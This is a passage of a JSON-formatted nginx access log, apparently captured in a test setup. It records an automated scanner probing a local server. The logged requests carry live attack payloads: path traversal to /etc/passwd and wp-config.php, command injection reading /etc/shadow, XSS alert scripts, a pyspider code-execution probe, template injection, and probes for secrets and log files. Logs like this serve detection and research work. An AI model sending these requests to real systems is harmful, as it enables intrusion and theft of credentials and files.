+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jquery-file-upload/server/php/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configurations HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug/pyspidervulntest/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&tag= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SecMail/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/custom.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"yr=2021&mh=6&fname=../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /viewlog.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.development.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:http://www.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search.php?searchtype=5 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps-admin/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /license.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.production.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/redirection/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pyproject.toml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", 